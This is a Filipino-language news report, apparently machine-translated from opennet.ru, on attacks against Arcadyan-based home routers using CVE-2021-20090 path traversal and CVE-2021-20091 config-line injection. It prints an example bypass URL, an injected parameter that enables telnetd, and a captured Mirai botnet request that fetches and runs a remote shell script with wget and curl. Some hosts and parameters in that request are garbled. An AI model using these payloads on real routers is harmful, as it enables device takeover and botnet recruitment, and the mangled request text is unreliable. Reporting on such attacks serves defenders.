Isang napakalaking pag-atake ang naitala sa network laban sa mga home router na ang firmware ay gumagamit ng pagpapatupad ng HTTP server mula sa kumpanyang Arcadyan. Upang makakuha ng kontrol sa mga device, isang kumbinasyon ng dalawang kahinaan ang ginagamit na nagbibigay-daan sa malayuang pagpapatupad ng arbitrary code na may mga karapatan sa ugat. Ang problema ay nakakaapekto sa isang medyo malawak na hanay ng mga ADSL router mula sa Arcadyan, ASUS at Buffalo, pati na rin ang mga device na ibinibigay sa ilalim ng mga tatak ng Beeline (ang problema ay nakumpirma sa Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone at iba pang telecom operator. Ito ay nabanggit na ang problema ay naroroon sa Arcadyan firmware para sa higit sa 10 taon at sa panahong ito ay pinamamahalaang upang lumipat sa hindi bababa sa 20 mga modelo ng aparato mula sa 17 iba't ibang mga tagagawa.
Ang unang kahinaan, CVE-2021-20090, ay ginagawang posible na ma-access ang anumang script ng web interface nang walang pagpapatunay. Ang kakanyahan ng kahinaan ay na sa web interface, ang ilang mga direktoryo kung saan ipinapadala ang mga larawan, CSS file at mga script ng JavaScript ay naa-access nang walang pagpapatunay. Sa kasong ito, ang mga direktoryo kung saan pinapayagan ang pag-access nang walang pagpapatunay ay sinusuri gamit ang paunang maskara. Ang pagtukoy sa "../" na mga character sa mga path na pupunta sa parent directory ay na-block ng firmware, ngunit ang paggamit ng "..%2f" na kumbinasyon ay nilaktawan. Kaya, posibleng magbukas ng mga protektadong pahina kapag nagpapadala ng mga kahilingan tulad ng βhttp://192.168.1.1/images/..%2findex.htmβ.
Ang pangalawang kahinaan, ang CVE-2021-20091, ay nagbibigay-daan sa isang napatotohanang user na gumawa ng mga pagbabago sa mga setting ng system ng device sa pamamagitan ng pagpapadala ng mga espesyal na naka-format na parameter sa script na apply_abstract.cgi, na hindi nagsusuri ng pagkakaroon ng bagong linya na character sa mga parameter . Halimbawa, kapag nagsasagawa ng ping operation, maaaring tukuyin ng attacker ang value na "192.168.1.2%0AARC_SYS_TelnetdEnable=1" sa field na may sinusuri ang IP address, at ang script, kapag gumagawa ng settings file /tmp/etc/config/ .glbcfg, ay magsusulat ng linyang βAARC_SYS_TelnetdEnable=1β dito ", na nag-a-activate sa telnetd server, na nagbibigay ng hindi pinaghihigpitang command shell access na may mga karapatan sa ugat. Katulad nito, sa pamamagitan ng pagtatakda ng parameter ng AARC_SYS, maaari mong isagawa ang anumang code sa system. Ginagawang posible ng unang kahinaan na magpatakbo ng may problemang script nang walang pagpapatotoo sa pamamagitan ng pag-access dito bilang "/images/..%2fapply_abstract.cgi".
Upang samantalahin ang mga kahinaan, ang isang umaatake ay dapat na makapagpadala ng isang kahilingan sa port ng network kung saan tumatakbo ang web interface. Sa paghusga sa dynamics ng pagkalat ng pag-atake, maraming mga operator ang nag-iiwan ng access sa kanilang mga device mula sa panlabas na network upang pasimplehin ang diagnosis ng mga problema ng serbisyo ng suporta. Kung ang pag-access sa interface ay limitado lamang sa panloob na network, ang isang pag-atake ay maaaring isagawa mula sa isang panlabas na network gamit ang "DNS rebinding" na pamamaraan. Aktibong ginagamit na ang mga kahinaan para ikonekta ang mga router sa Mirai botnet: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Connection: close User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7.ipaddress=0. 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX
Pinagmulan: opennet.ru